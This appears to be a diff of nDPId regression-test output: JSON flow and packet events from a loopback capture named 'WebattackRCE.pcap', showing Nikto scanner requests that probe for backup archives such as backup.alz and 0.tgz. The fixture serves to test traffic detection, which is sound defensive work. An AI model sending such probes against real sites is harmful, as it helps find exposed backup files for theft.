(Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 